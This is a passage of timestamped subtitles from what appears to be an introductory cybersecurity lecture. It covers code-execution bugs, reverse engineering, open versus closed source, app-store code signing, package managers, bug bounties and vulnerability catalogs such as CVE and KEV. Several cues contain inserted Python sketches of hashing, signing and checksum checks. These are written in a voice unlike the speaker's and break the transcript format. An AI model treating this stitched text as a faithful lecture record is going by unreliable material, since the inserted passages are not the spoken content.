1894 01:39:22,320 --> 01:39:26,070 that the adversary themselves injected. 1895 01:39:26,070 --> 01:39:27,480 Now, what does that mean? 1896 01:39:27,480 --> 01:39:31,230 If you are running the software under your user name, whatever 1897 01:39:31,230 --> 01:39:35,500 you can do on the software and the system, be it your Mac or PC or phone, 1898 01:39:35,500 --> 01:39:37,770 so now can the adversary. 1899 01:39:37,770 --> 01:39:40,350 And maybe they'll now delete all of your files. 1900 01:39:40,350 --> 01:39:43,290 Maybe they will now all register the software. 1901 01:39:43,290 --> 01:39:44,970 Maybe they will now start sending spam. 1902 01:39:44,970 --> 01:39:51,190 Anything at all is possible based on what the adversary has passed in here. 1903 01:39:51,190 --> 01:39:55,140 So if you've ever heard of a website called stackoverflow.com, 1904 01:39:55,140 --> 01:39:58,260 which is a popular website for programmers to ask questions and get 1905 01:39:58,260 --> 01:40:01,050 answers of a community, that specifically 1906 01:40:01,050 --> 01:40:06,330 is the allusion to exactly this kind of bug or mistake, 1907 01:40:06,330 --> 01:40:10,920 whereby, if not programmed properly, the stack can overflow. 1908 01:40:10,920 --> 01:40:14,520 And if the software or programmer does not anticipate or detect it, 1909 01:40:14,520 --> 01:40:16,120 bad things can happen. 1910 01:40:16,120 --> 01:40:18,600 You can have arbitrary code executed, or you 1911 01:40:18,600 --> 01:40:22,620 can have remote code executed if the adversary isn't even at that keyboard 1912 01:40:22,620 --> 01:40:27,090 but is somehow sending this code into your software via some network 1913 01:40:27,090 --> 01:40:27,840 connection. 1914 01:40:27,840 --> 01:40:30,772 What then might this mean? 
1915 01:40:30,772 --> 01:40:32,730 So if you've ever heard of the term "cracking," 1916 01:40:32,730 --> 01:40:36,630 which typically refers to figuring out someone's password or, in this case, 1917 01:40:36,630 --> 01:40:39,450 breaking into software, cracking might refer 1918 01:40:39,450 --> 01:40:42,330 to eliminating the need for a serial number 1919 01:40:42,330 --> 01:40:45,000 or an activation code or the like, because if you 1920 01:40:45,000 --> 01:40:49,740 can inject any code that you want into someone's software, 1921 01:40:49,740 --> 01:40:53,220 you could tell that software to just skip the lines of code, the zeros 1922 01:40:53,220 --> 01:40:56,340 and ones that represent asking you for that activation code, 1923 01:40:56,340 --> 01:40:59,520 or they can do something much more malicious. 1924 01:40:59,520 --> 01:41:02,640 So this is an example, in some sense, of what we might also 1925 01:41:02,640 --> 01:41:04,110 call reverse engineering. 1926 01:41:04,110 --> 01:41:07,020 Reverse engineering refers to the ability for someone 1927 01:41:07,020 --> 01:41:10,590 to figure out how something was engineered, how it was built. 1928 01:41:10,590 --> 01:41:12,780 Now, at the end of the day, most of the software 1929 01:41:12,780 --> 01:41:15,690 that you and I install on our Macs or PCs or phones 1930 01:41:15,690 --> 01:41:17,790 is pretty much just zeros and ones. 1931 01:41:17,790 --> 01:41:22,120 So it's very nonobvious to an adversary even what is actually going on. 1932 01:41:22,120 --> 01:41:25,410 But with certain techniques, with certain trial and error, 1933 01:41:25,410 --> 01:41:28,620 they can actually figure out what those zeros and ones represent. 1934 01:41:28,620 --> 01:41:31,560 And depending on the language that was used to generate that software, 1935 01:41:31,560 --> 01:41:34,290 they might be able to glean even more information than that. 1936 01:41:34,290 --> 01:41:37,710 Now, there's a good side of reverse engineering, whereby 1937 01:41:37,710 --> 01:41:41,700 if you and I are in the business of figuring out 1938 01:41:41,700 --> 01:41:45,360 how malware was implemented so that you and I can contribute solutions 1939 01:41:45,360 --> 01:41:47,400 to antivirus software and the like, well, 1940 01:41:47,400 --> 01:41:50,730 malware analysis uses these same kinds of techniques, 1941 01:41:50,730 --> 01:41:54,750 trying to figure out what's going on underneath the hood of software 1942 01:41:54,750 --> 01:41:57,780 as by reverse engineering it, so using trial and error, 1943 01:41:57,780 --> 01:42:00,000 maybe injecting some code of our own, to figure out 1944 01:42:00,000 --> 01:42:05,760 exactly what instructions are embedded among all of those zeros and ones. 1945 01:42:05,760 --> 01:42:10,530 Now, how might you hedge against these kinds of threats of remote code 1946 01:42:10,530 --> 01:42:14,040 execution, arbitrary code execution, with software of your own? 1947 01:42:14,040 --> 01:42:17,640 Well, you could start using open-source software, for instance. 1948 01:42:17,640 --> 01:42:21,820 Open-source software just means that the code that implements that software, 1949 01:42:21,820 --> 01:42:28,500 be it in Python or PHP or Java or C# or C++ or any number of other languages is 1950 01:42:28,500 --> 01:42:29,550 itself open source. 
1951 01:42:29,550 --> 01:42:31,800 That is, you and I and anyone on the internet 1952 01:42:31,800 --> 01:42:35,700 typically can read the source code and see exactly what instructions will 1953 01:42:35,700 --> 01:42:37,950 be executed on your computer or phone. 1954 01:42:37,950 --> 01:42:41,370 Now, that doesn't necessarily mean that the version 1955 01:42:41,370 --> 01:42:44,820 of the software that you are running is exactly 1956 01:42:44,820 --> 01:42:46,470 the same as the open-source version. 1957 01:42:46,470 --> 01:42:49,290 There's still a threat whereby the code might be open source, 1958 01:42:49,290 --> 01:42:52,170 but maybe you were tricked via some phishing email 1959 01:42:52,170 --> 01:42:54,600 or some malicious website into installing 1960 01:42:54,600 --> 01:42:58,750 a fake version of some software that actually has malicious code in it. 1961 01:42:58,750 --> 01:43:01,120 So malware might still be a problem. 1962 01:43:01,120 --> 01:43:03,630 But a lot of folks think that open source 1963 01:43:03,630 --> 01:43:05,730 tends to be a good thing because you can audit-- 1964 01:43:05,730 --> 01:43:07,740 smart people on the internet can audit the code 1965 01:43:07,740 --> 01:43:11,570 and make sure that there are no "backdoors" or malicious instructions 1966 01:43:11,570 --> 01:43:14,870 that might do things that you wouldn't expect the software to do. 1967 01:43:14,870 --> 01:43:18,230 Now, again, that's not necessarily the case that the version you're running 1968 01:43:18,230 --> 01:43:20,390 doesn't still have some form of infection. 1969 01:43:20,390 --> 01:43:23,000 But this might give you at least a bit more reassurance. 1970 01:43:23,000 --> 01:43:27,110 Now the flip side, though, is that if code is open source, even if it's 1971 01:43:27,110 --> 01:43:29,150 devoid of anything malicious, it might still 1972 01:43:29,150 --> 01:43:33,560 have bugs, mistakes, that human programmers accidentally made, 1973 01:43:33,560 --> 01:43:37,400 which might very well make open-source software, or any software, 1974 01:43:37,400 --> 01:43:39,090 vulnerable to attack. 1975 01:43:39,090 --> 01:43:45,080 I mean, you're literally giving the adversaries the plans to your software. 1976 01:43:45,080 --> 01:43:47,390 It's like the plans to the Death Star in Star Wars, 1977 01:43:47,390 --> 01:43:49,370 such that they can probably figure out what 1978 01:43:49,370 --> 01:43:52,250 the weaknesses are in your software because you're 1979 01:43:52,250 --> 01:43:54,410 giving them the blueprint therefore. 1980 01:43:54,410 --> 01:43:57,020 So an alternative to open-source software 1981 01:43:57,020 --> 01:43:59,790 is perhaps the default, which is closed-source software. 1982 01:43:59,790 --> 01:44:02,420 So any software that you might download or buy from companies 1983 01:44:02,420 --> 01:44:04,700 that it's not open source is typically closed 1984 01:44:04,700 --> 01:44:08,180 source, which means only they, only their employees, have access to it. 1985 01:44:08,180 --> 01:44:11,410 Now, the downside is that you, the user, do not 1986 01:44:11,410 --> 01:44:13,660 have access to closed-source software. 1987 01:44:13,660 --> 01:44:15,730 Only the authors, therefore, do. 1988 01:44:15,730 --> 01:44:21,370 But the upside, arguably, is that now so do adversaries on the internet 1989 01:44:21,370 --> 01:44:23,030 not have access to it. 
1990 01:44:23,030 --> 01:44:26,680 So maybe the probability that that software not only has mistakes, 1991 01:44:26,680 --> 01:44:30,230 but those mistakes are exploited, is perhaps lower. 1992 01:44:30,230 --> 01:44:32,500 And so this is perhaps more of a debate. 1993 01:44:32,500 --> 01:44:34,750 And you yourselves, as you consider this, might 1994 01:44:34,750 --> 01:44:37,780 have to form your own opinions on open source versus closed source. 1995 01:44:37,780 --> 01:44:40,000 But another argument in favor of open source 1996 01:44:40,000 --> 01:44:42,550 is often that with so many people around the world 1997 01:44:42,550 --> 01:44:46,750 having eyes on software, perhaps that actually increases the probability 1998 01:44:46,750 --> 01:44:51,430 that we will detect bugs or detect potential exploits because so many more 1999 01:44:51,430 --> 01:44:54,543 smart people are looking at it and therefore weighing in. 2000 01:44:54,543 --> 01:44:57,460 The downside, of course, is that if one of those smart people is an adversary, 2001 01:44:57,460 --> 01:45:00,730 and they find it and don't tell anyone, then we're back to a problem 2002 01:45:00,730 --> 01:45:04,510 from a previous class, wherein we discussed those zero-day attacks. 2003 01:45:04,510 --> 01:45:07,780 But this is one way, one mental model you might have, 2004 01:45:07,780 --> 01:45:11,320 for evaluating just how secure your own software might 2005 01:45:11,320 --> 01:45:14,950 be that you're either using as a user or developing as a company. 2006 01:45:14,950 --> 01:45:18,580 What's another way that you might gain some assurance that the software you're 2007 01:45:18,580 --> 01:45:23,920 installing and using is not infected with some form of vulnerability 2008 01:45:23,920 --> 01:45:26,560 or malicious intent? 2009 01:45:26,560 --> 01:45:28,600 Well, you could download all of the software 2010 01:45:28,600 --> 01:45:32,860 that you use only from an approved app store, be it in the world of iPhones 2011 01:45:32,860 --> 01:45:35,980 or Android devices, macOS, Windows, or the like, 2012 01:45:35,980 --> 01:45:39,100 whereby you have some other entity, like a Google or an Apple 2013 01:45:39,100 --> 01:45:45,190 or a Microsoft, a big company that is at least analyzing the applications that 2014 01:45:45,190 --> 01:45:49,120 are being uploaded to these app stores before they're 2015 01:45:49,120 --> 01:45:51,370 allowed to be distributed to people like you and me. 2016 01:45:51,370 --> 01:45:54,245 Now, that's not to say that Apple and Microsoft and Google or others 2017 01:45:54,245 --> 01:45:54,850 are perfect. 2018 01:45:54,850 --> 01:45:59,110 There have absolutely been many cases where even applications in these app 2019 01:45:59,110 --> 01:46:03,430 stores have had some malicious feature that the companies only realized after the fact. 2020 01:46:03,430 --> 01:46:07,330 But again, it's probably increasing the probability 2021 01:46:07,330 --> 01:46:09,880 that some smart people or automated software 2022 01:46:09,880 --> 01:46:13,960 is going to detect those things first before it even reaches your device. 2023 01:46:13,960 --> 01:46:17,350 And therefore, it makes it harder for the adversary-- raises the bar, 2024 01:46:17,350 --> 01:46:20,320 raises the cost, raises the risk to them to even get 2025 01:46:20,320 --> 01:46:21,740 something like that distributed. 2026 01:46:21,740 --> 01:46:22,730 So what does this mean?
2027 01:46:22,730 --> 01:46:24,772 Well, when you install software on your computer, 2028 01:46:24,772 --> 01:46:27,610 perhaps you should get it only from Microsoft or Google or Apple 2029 01:46:27,610 --> 01:46:31,000 and not from some random website, and certainly not from some random email 2030 01:46:31,000 --> 01:46:34,480 that someone sent you with a link to download some piece of software. 2031 01:46:34,480 --> 01:46:36,320 Now, that's not always going to be the case. 2032 01:46:36,320 --> 01:46:40,210 And particularly, if you yourself are an aspiring programmer, a software 2033 01:46:40,210 --> 01:46:43,300 developer, you might need to be in the habit of installing 2034 01:46:43,300 --> 01:46:46,382 sort of "unauthorized software" for which you might have 2035 01:46:46,382 --> 01:46:49,090 to jump through some hoops and change some settings in your phone 2036 01:46:49,090 --> 01:46:54,310 or in your Mac or PC to even allow you to install unauthorized software if you 2037 01:46:54,310 --> 01:46:55,360 know what you're doing. 2038 01:46:55,360 --> 01:46:59,860 But these kinds of mechanisms, even though they create dissatisfaction 2039 01:46:59,860 --> 01:47:02,110 with this idea of a walled garden, whereby 2040 01:47:02,110 --> 01:47:04,510 you need some corporate entity's permission 2041 01:47:04,510 --> 01:47:08,960 just to distribute your software-- they do serve a good purpose as well. 2042 01:47:08,960 --> 01:47:11,740 So there, too, you might fall on one side or the other 2043 01:47:11,740 --> 01:47:14,080 of that sort of argument. 2044 01:47:14,080 --> 01:47:19,150 Now, how do those app stores enforce the fact 2045 01:47:19,150 --> 01:47:23,660 that you can only install the software if it is in the app store itself? 2046 01:47:23,660 --> 01:47:27,490 Well, it turns out we can revisit some of our primitives from past classes, 2047 01:47:27,490 --> 01:47:31,270 whereby we talked about encryption and also hashing 2048 01:47:31,270 --> 01:47:35,500 and also digital signatures, the latter two of which are particularly germane here. 2049 01:47:35,500 --> 01:47:39,910 It turns out that cryptography really is the solution to a lot of the world's 2050 01:47:39,910 --> 01:47:42,250 current problems when it comes to cybersecurity 2051 01:47:42,250 --> 01:47:46,570 if we use these primitives, hashing, encryption, and digital signing 2052 01:47:46,570 --> 01:47:48,740 as building blocks to solutions. 2053 01:47:48,740 --> 01:47:52,180 So, for instance, when you develop a piece of software, 2054 01:47:52,180 --> 01:47:55,510 or some company does this for you, and they upload their software 2055 01:47:55,510 --> 01:47:58,750 to Apple or Google or Microsoft for distribution, 2056 01:47:58,750 --> 01:48:00,790 what are those companies doing? 2057 01:48:00,790 --> 01:48:04,510 Well, first, you, as the author of the software, 2058 01:48:04,510 --> 01:48:08,360 are using your own public and private key, 2059 01:48:08,360 --> 01:48:09,910 which you came up with in advance. 2060 01:48:09,910 --> 01:48:14,500 And you are running your software through some special function 2061 01:48:14,500 --> 01:48:16,940 or algorithm and getting back a hash thereof. 2062 01:48:16,940 --> 01:48:20,240 Again, a hash is this fixed-length representation of your software. 2063 01:48:20,240 --> 01:48:22,280 So even if you wrote a really big program, 2064 01:48:22,280 --> 01:48:26,800 you have this unique identifier, or, with high probability, unique 2065 01:48:26,800 --> 01:48:29,060 identifier, called a hash.
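To make that concrete, here is a minimal sketch in Python using the standard library's hashlib; the file name is purely illustrative.

    import hashlib

    # Read the (hypothetical) program's bytes; the input can be any size.
    with open("myprogram.bin", "rb") as f:
        software = f.read()

    # SHA-256 always produces a fixed-length, 32-byte (256-bit) digest,
    # no matter how large the program is.
    digest = hashlib.sha256(software).hexdigest()
    print(digest)  # 64 hexadecimal characters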
2066 01:48:29,060 --> 01:48:32,860 And what you can then do with that hash is use your private key 2067 01:48:32,860 --> 01:48:37,270 and sign that hash, giving you a digital signature. 2068 01:48:37,270 --> 01:48:41,680 That signature can be verified by Google or Microsoft or Apple as being, 2069 01:48:41,680 --> 01:48:44,920 OK, I know that David Malan wrote this software because I 2070 01:48:44,920 --> 01:48:47,200 know that only he has that private key. 2071 01:48:47,200 --> 01:48:50,170 And so long as I, David Malan, registered my public key 2072 01:48:50,170 --> 01:48:52,240 with Apple or Google or Microsoft in advance, 2073 01:48:52,240 --> 01:48:55,060 they can assume that, OK, this new version 2074 01:48:55,060 --> 01:48:58,120 of the software or this new program came from David Malan 2075 01:48:58,120 --> 01:49:01,960 and not from some random person on the internet pretending to be David Malan. 2076 01:49:01,960 --> 01:49:07,810 Conversely, what Google and Microsoft and Apple and others 2077 01:49:07,810 --> 01:49:12,420 can do is the same thing-- once you have uploaded your software to their app 2078 01:49:12,420 --> 01:49:18,570 store, they can run the software through the same function, 2079 01:49:18,570 --> 01:49:22,140 getting back a hash thereof, a unique representation thereof. 2080 01:49:22,140 --> 01:49:26,220 They can use their own private key from their own app store 2081 01:49:26,220 --> 01:49:30,480 to take that hash as input and produce a digital signature, this time signed 2082 01:49:30,480 --> 01:49:34,530 by Apple or Microsoft or Google or whoever else is running the app store. 2083 01:49:34,530 --> 01:49:40,440 And then when you or I install that software on our Mac or our PC, 2084 01:49:40,440 --> 01:49:43,920 or on our phones, our phones and devices can 2085 01:49:43,920 --> 01:49:48,030 ensure that any software you and I are installing on our device 2086 01:49:48,030 --> 01:49:51,840 was digitally signed by that app store, by Google 2087 01:49:51,840 --> 01:49:55,300 or Microsoft or Apple or the like. 2088 01:49:55,300 --> 01:49:59,010 So again, just by using this basic building block of digital signatures 2089 01:49:59,010 --> 01:50:02,160 and hashing in this case, you can both attest in one direction 2090 01:50:02,160 --> 01:50:04,170 that I am David Malan. 2091 01:50:04,170 --> 01:50:06,330 Trust that my software was written by me. 2092 01:50:06,330 --> 01:50:09,070 Conversely, when people install my software, 2093 01:50:09,070 --> 01:50:11,890 they can trust that if Apple or Google or Microsoft or others 2094 01:50:11,890 --> 01:50:15,710 trust that software, it should indeed be safe to double-click it. 2095 01:50:15,710 --> 01:50:19,090 And it's only when you download some unauthorized software 2096 01:50:19,090 --> 01:50:22,870 from the internet, typically, that you often nowadays get on your screen 2097 01:50:22,870 --> 01:50:25,420 an alert saying, this has not been signed, 2098 01:50:25,420 --> 01:50:29,230 or this is from an unauthorized third-party developer or the like, 2099 01:50:29,230 --> 01:50:32,620 if they're not playing nicely in this same ecosystem. 2100 01:50:32,620 --> 01:50:35,750 But again, digital signatures take us a long way there. 2101 01:50:35,750 --> 01:50:39,170 So another mechanism you can consider, which is similar in spirit 2102 01:50:39,170 --> 01:50:42,550 but uses terminology typically heard in the world of Linux computers 2103 01:50:42,550 --> 01:50:45,400 or similar, is package managers.
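Before turning to package managers, here is one minimal sketch of that sign-then-verify flow in Python, assuming the third-party cryptography package is installed; the key names and the placeholder "software" bytes are illustrative, not any app store's actual pipeline.

    import hashlib
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric import ed25519

    software = b"...the program's zeros and ones..."  # placeholder bytes

    # Developer: hash the software, then sign the hash with a private key.
    dev_private = ed25519.Ed25519PrivateKey.generate()
    dev_public = dev_private.public_key()  # registered with the store in advance
    signature = dev_private.sign(hashlib.sha256(software).digest())

    # App store (or, later, your device): recompute the hash and verify the
    # signature against the developer's public key; verify() raises an error
    # if the software or the signature has been tampered with.
    try:
        dev_public.verify(signature, hashlib.sha256(software).digest())
        print("Signature valid: this came from the registered developer.")
    except InvalidSignature:
        print("Signature invalid: do not install.")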
2104 01:50:45,400 --> 01:50:47,680 And different programming languages also come 2105 01:50:47,680 --> 01:50:50,260 with an ecosystem of libraries, third-party code, 2106 01:50:50,260 --> 01:50:54,220 that people write and they make freely available, often as open source. 2107 01:50:54,220 --> 01:50:57,310 But there are standard ways by which these package managers 2108 01:50:57,310 --> 01:51:02,020 can let you and me install the software on our own Macs, PCs, phones, 2109 01:51:02,020 --> 01:51:02,710 or the like. 2110 01:51:02,710 --> 01:51:08,890 And it's using tools like pip for Python, gem for Ruby, npm for Node.js, 2111 01:51:08,890 --> 01:51:11,350 and there's others as well-- apt for Linux. 2112 01:51:11,350 --> 01:51:13,690 These package managers, though, typically adopt 2113 01:51:13,690 --> 01:51:18,310 a very similar mechanism, whereby they are digitally signing these packages so 2114 01:51:18,310 --> 01:51:23,080 that you and I can have our computers verify those signatures before they're 2115 01:51:23,080 --> 01:51:24,760 actually allowed to be installed. 2116 01:51:24,760 --> 01:51:28,430 And in general, this involves operating systems as well. 2117 01:51:28,430 --> 01:51:31,360 The operating systems that you and I are running nowadays, 2118 01:51:31,360 --> 01:51:34,720 at least if you stayed current and are in the habit of automatic updates 2119 01:51:34,720 --> 01:51:36,490 or frequent manual updates-- 2120 01:51:36,490 --> 01:51:40,270 odds are today's more modern operating systems are increasingly 2121 01:51:40,270 --> 01:51:44,390 building in native support for these kinds of checks. 2122 01:51:44,390 --> 01:51:47,650 Downside is it's getting a little more difficult, a little more annoying, 2123 01:51:47,650 --> 01:51:50,410 to install third-party software on our devices. 2124 01:51:50,410 --> 01:51:53,560 But the upside is that if you trust these app 2125 01:51:53,560 --> 01:51:57,100 stores, these package managers, then, by transitivity, 2126 01:51:57,100 --> 01:52:00,970 you can with higher probability trust the software being 2127 01:52:00,970 --> 01:52:02,230 distributed there too. 2128 01:52:02,230 --> 01:52:05,320 Now this too, though, is not fail-safe, and it has often 2129 01:52:05,320 --> 01:52:08,500 happened that even when software has been uploaded to these app stores 2130 01:52:08,500 --> 01:52:11,050 or package managers and made available to folks, 2131 01:52:11,050 --> 01:52:15,220 version 1 might be perfectly safe, version 2 might be perfectly safe, 2132 01:52:15,220 --> 01:52:19,900 but version 3 might be malicious for some reason. 2133 01:52:19,900 --> 01:52:24,848 Maybe the developer finally decided to do what their intention was all along. 2134 01:52:24,848 --> 01:52:26,890 Maybe the developer-- and this has happened too-- 2135 01:52:26,890 --> 01:52:29,920 sold their software to someone else, and the third party now 2136 01:52:29,920 --> 01:52:32,080 is adding ads or something malicious to it. 2137 01:52:32,080 --> 01:52:34,930 Or someone has hacked their computer or account 2138 01:52:34,930 --> 01:52:37,990 and gained access to their private key and not just their public key 2139 01:52:37,990 --> 01:52:39,800 and is therefore masquerading as them. 2140 01:52:39,800 --> 01:52:44,200 So even now, you can't necessarily trust the software 2141 01:52:44,200 --> 01:52:45,547 you're running on your computer.
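In that same spirit, here is a minimal sketch in Python of the kind of check a package manager can perform before installing anything: comparing a downloaded file's hash against a published value. The file name and expected digest are placeholders, and real tools like pip, apt, and npm layer digital signatures and metadata on top of this basic idea.

    import hashlib
    import hmac

    EXPECTED_SHA256 = "..."  # digest published by the package's maintainers (placeholder)

    def verify_download(path: str, expected_hex: str) -> bool:
        """Return True only if the file's SHA-256 matches the published digest."""
        with open(path, "rb") as f:
            actual_hex = hashlib.sha256(f.read()).hexdigest()
        # compare_digest does a constant-time comparison of the two strings.
        return hmac.compare_digest(actual_hex, expected_hex)

    if verify_download("somepackage-1.0.tar.gz", EXPECTED_SHA256):
        print("Checksum matches; proceed with installation.")
    else:
        print("Checksum mismatch; refuse to install.")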
2142 01:52:45,547 --> 01:52:48,130 But again, that brings us back to some of our earliest lessons 2143 01:52:48,130 --> 01:52:50,213 in the class, where what we're really trying to do 2144 01:52:50,213 --> 01:52:53,170 is raise the bar to the adversary, increase the cost, 2145 01:52:53,170 --> 01:52:56,260 increase the risk to them, and conversely decrease 2146 01:52:56,260 --> 01:53:00,220 the probability to us that any one of these pieces of software 2147 01:53:00,220 --> 01:53:02,830 might actually be malicious. 2148 01:53:02,830 --> 01:53:06,700 Now, there are models that the world has been experimenting with over time 2149 01:53:06,700 --> 01:53:10,270 to try to figure out how best to reduce these probabilities further. 2150 01:53:10,270 --> 01:53:14,740 And there's this notion of bug bounties, whereby some companies will actually 2151 01:53:14,740 --> 01:53:17,980 steer into the reality that there are people out there with the skills, 2152 01:53:17,980 --> 01:53:22,900 not only to do malicious things with their software, but also good things 2153 01:53:22,900 --> 01:53:23,660 as well. 2154 01:53:23,660 --> 01:53:29,560 For instance, there are people who might very well want to try to find bugs in software, 2155 01:53:29,560 --> 01:53:31,990 particularly ones that relate to security, 2156 01:53:31,990 --> 01:53:36,100 if they know that the company in whose software they're discovering these bugs 2157 01:53:36,100 --> 01:53:38,990 is willing to pay for it-- and not in a ransom sense, 2158 01:53:38,990 --> 01:53:44,410 not in a malicious ransom sense, but in a bounty sense. There tends 2159 01:53:44,410 --> 01:53:47,290 to be this marketplace for some companies and some products, 2160 01:53:47,290 --> 01:53:50,080 whereby if you do discover a bug in their software, 2161 01:53:50,080 --> 01:53:54,140 and you disclose it only to the designers of the software, 2162 01:53:54,140 --> 01:53:57,340 at least during some window of time before you tell the world about it, 2163 01:53:57,340 --> 01:53:58,540 they will pay you. 2164 01:53:58,540 --> 01:54:02,320 That way, they can fix the bug and then 2165 01:54:02,320 --> 01:54:05,050 pay out, because it's a net positive for everyone. 2166 01:54:05,050 --> 01:54:05,560 Win-win. 2167 01:54:05,560 --> 01:54:06,340 You have benefited. 2168 01:54:06,340 --> 01:54:07,173 They have benefited. 2169 01:54:07,173 --> 01:54:09,280 And hopefully, no adversaries have found it first. 2170 01:54:09,280 --> 01:54:11,200 And depending on the severity of these bugs, 2171 01:54:11,200 --> 01:54:14,750 you might get paid more or less accordingly. 2172 01:54:14,750 --> 01:54:17,260 And so the idea here of these bug bounty programs 2173 01:54:17,260 --> 01:54:21,220 is to try to leverage the collective intelligence and technical skill 2174 01:54:21,220 --> 01:54:23,590 of people who, frankly, without these programs, 2175 01:54:23,590 --> 01:54:27,400 maybe would be using their skills for evil and trying to hack these systems 2176 01:54:27,400 --> 01:54:29,140 and monetize them through ransomware. 2177 01:54:29,140 --> 01:54:33,700 But perhaps we could channel those funds instead toward paying people 2178 01:54:33,700 --> 01:54:35,180 to do this kind of work. 2179 01:54:35,180 --> 01:54:38,920 So this too is something to consider not so much as a user using software 2180 01:54:38,920 --> 01:54:42,980 but perhaps as a company developing software. 2181 01:54:42,980 --> 01:54:44,980 So where can you learn more?
2182 01:54:44,980 --> 01:54:46,900 And what has the world come up with to keep 2183 01:54:46,900 --> 01:54:49,060 track of all of these possible threats? 2184 01:54:49,060 --> 01:54:52,420 And what we focused on today really are representative attacks 2185 01:54:52,420 --> 01:54:54,370 using some languages and technologies that 2186 01:54:54,370 --> 01:54:56,740 are quite omnipresent and fairly accessible, 2187 01:54:56,740 --> 01:54:58,580 at least at the level we've explained them. 2188 01:54:58,580 --> 01:55:02,557 But it turns out that there is a whole inventory of vulnerabilities 2189 01:55:02,557 --> 01:55:05,140 that have been detected over the years, Common Vulnerabilities 2190 01:55:05,140 --> 01:55:09,290 and Exposures, or CVEs, such that a lot of the kinds of attacks 2191 01:55:09,290 --> 01:55:12,050 we've been talking about today and, more specifically, 2192 01:55:12,050 --> 01:55:15,500 bugs and flaws in specific software and versions 2193 01:55:15,500 --> 01:55:19,640 thereof are often assigned a unique identifier, a CVE 2194 01:55:19,640 --> 01:55:23,480 number that system administrators, companies, and even end users 2195 01:55:23,480 --> 01:55:27,320 can keep track of to make sure they are always current with the latest threats 2196 01:55:27,320 --> 01:55:28,010 out there. 2197 01:55:28,010 --> 01:55:32,120 There is also a Common Vulnerability Scoring System, or CVSS, 2198 01:55:32,120 --> 01:55:34,850 which is a standardized way of assigning a score 2199 01:55:34,850 --> 01:55:36,800 to the severity of a vulnerability. 2200 01:55:36,800 --> 01:55:37,850 Is it a big deal? 2201 01:55:37,850 --> 01:55:39,500 Or is it not so much a big deal? 2202 01:55:39,500 --> 01:55:41,510 It might still be a vulnerability, a bug. 2203 01:55:41,510 --> 01:55:43,350 But is it that problematic? 2204 01:55:43,350 --> 01:55:45,920 And so there's this scale so that you can prioritize things-- 2205 01:55:45,920 --> 01:55:49,550 for instance, given limited resources or time, which of the bugs 2206 01:55:49,550 --> 01:55:52,760 you should be fixing, which of the software you should be updating, 2207 01:55:52,760 --> 01:55:54,680 or maybe which of the software you should not 2208 01:55:54,680 --> 01:55:58,880 be using, at least while it's vulnerable to something that's highly severe. 2209 01:55:58,880 --> 01:56:01,790 There's an Exploit Prediction Scoring System out there, 2210 01:56:01,790 --> 01:56:05,690 EPSS, which refers to what people in the real world 2211 01:56:05,690 --> 01:56:11,060 think the probability is that this particular bug or mistake in software 2212 01:56:11,060 --> 01:56:12,710 will be exploited. 2213 01:56:12,710 --> 01:56:16,550 And this then might give you a sense of just how problematic it is. 2214 01:56:16,550 --> 01:56:18,890 Even if there's something very severe, is it more 2215 01:56:18,890 --> 01:56:21,680 of a hypothetical threat or an actual threat, something 2216 01:56:21,680 --> 01:56:25,520 that IT people might indeed take into account when deciding 2217 01:56:25,520 --> 01:56:27,290 how to respond to some threat. 2218 01:56:27,290 --> 01:56:31,610 And then there's a Known Exploited Vulnerabilities catalog, KEV, 2219 01:56:31,610 --> 01:56:34,220 which refers to all of these kinds of bugs 2220 01:56:34,220 --> 01:56:36,800 that are known to have been exploited.
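As a toy illustration of how those scores might be combined to prioritize patching, here is a minimal sketch in Python; the CVE identifiers, scores, and weighting below are entirely made up for illustration, not taken from the real catalogs.

    # Each entry: a CVE identifier, a CVSS severity (0-10), an EPSS exploit
    # probability (0-1), and whether it appears in the KEV catalog.
    # All values are fabricated placeholders.
    vulnerabilities = [
        {"cve": "CVE-0000-0001", "cvss": 9.8, "epss": 0.02, "kev": False},
        {"cve": "CVE-0000-0002", "cvss": 7.5, "epss": 0.90, "kev": True},
        {"cve": "CVE-0000-0003", "cvss": 4.3, "epss": 0.01, "kev": False},
    ]

    def priority(v):
        # One possible heuristic: anything known to be exploited (KEV) first,
        # then by likelihood of exploitation, then by severity. Real teams
        # would tune this to their own risk model.
        return (v["kev"], v["epss"], v["cvss"])

    for v in sorted(vulnerabilities, key=priority, reverse=True):
        print(v["cve"], "CVSS:", v["cvss"], "EPSS:", v["epss"], "KEV:", v["kev"])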
2221 01:56:36,800 --> 01:56:39,200 So suffice it to say, here, we're now seeing 2222 01:56:39,200 --> 01:56:42,650 evidence of just how big of a world, how big of a space 2223 01:56:42,650 --> 01:56:46,508 cybersecurity is that we have all of these lists and taxonomies for keeping 2224 01:56:46,508 --> 01:56:49,550 track of things, because if you're feeling a little overwhelmed with just 2225 01:56:49,550 --> 01:56:52,534 some of the concepts, imagine just how many hundreds, 2226 01:56:52,534 --> 01:56:56,720 thousands of actual threats and vulnerabilities 2227 01:56:56,720 --> 01:56:59,180 there are in the actual wild. 2228 01:56:59,180 --> 01:57:01,280 All right, so that's a whole lot of threats 2229 01:57:01,280 --> 01:57:04,730 to the security of your software, whether you're using it as a user 2230 01:57:04,730 --> 01:57:06,410 or writing it as a developer. 2231 01:57:06,410 --> 01:57:08,840 But hopefully, by way of today's examples 2232 01:57:08,840 --> 01:57:12,410 of how software works, how adversaries can take advantage of it, 2233 01:57:12,410 --> 01:57:15,800 and how you can defend against it, you have a much better sense 2234 01:57:15,800 --> 01:57:17,840 of how to manage those threats. 2235 01:57:17,840 --> 01:57:21,890 Up ahead is how we might now preserve our own privacy. 2236 01:57:21,890 --> 01:57:24,700 More on that next time. 2237 01:57:24,700 --> 01:57:26,000